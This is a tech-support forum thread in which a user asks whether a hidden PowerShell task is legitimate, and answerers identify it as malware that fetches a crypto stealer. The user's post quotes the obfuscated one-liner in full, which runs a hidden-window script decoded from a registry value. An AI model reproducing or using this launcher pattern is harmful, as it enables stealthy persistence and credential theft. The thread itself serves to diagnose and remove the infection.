Unknown Power shell script running

Question

Unknown Power shell script running

Anonymous

Hi,

I usually get a brief pop-up for a script that runs at random times (as far as I can gather). Its only for a split second, but its a nuisance if I am gaming as my controller is just disabled until I swap out and back to the game window again.

I can see that there are several Power shell scripts that execute from the task schedular, but I am much more concerned about the below script that runs:

C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe -WINDOwstYLe hIDDen -COmmaNd "IcM ([scrIpTBLOck]::CrEatE([sTRInG]::joiN('', ((Get-iTempRopERtY -pATH 'Hklm:\SoFTwAre\asiOscCSU').'SCCsu95' | % { chAR }))))"

I have disabled all these PowerShell scripts, but deleted the above from the task schedular. Is the above a legitimate windows process? Also, I tried to find the registry key it is referring to but I cannot locate it.

Locked Question. This question was migrated from the Microsoft Support Community. You can vote on whether it's helpful, but you can't add comments or replies or follow the question.

0 comments

Answer accepted by question author

_AW_ 67,926 Volunteer Moderator

That command runs a script stored in the registry, that in all the ones I've looked at tries to download a crypto stealer. AFAIK the domains are dead, so nothing is downloaded.

Run a Malwarebytes scan to be sure there's nothing lurking.

https://www.malwarebytes.com/mwb-download

0 comments

1 additional answer

Answer 1

Hi, I'm Elise, and I'd be happy to help with your issue.

It certainly doesn’t look legitimate, it could be leftover from an app or service you had installed, or it could be malware.

I would certainly disable or delete any tasks such as this, I’d also recommend scanning your PC with something like Malware Bytes to see if anything is detected.

Please let me know if you need any further assistance.

Kind Regards,

Elise

Share via

Unknown Power shell script running

1 additional answer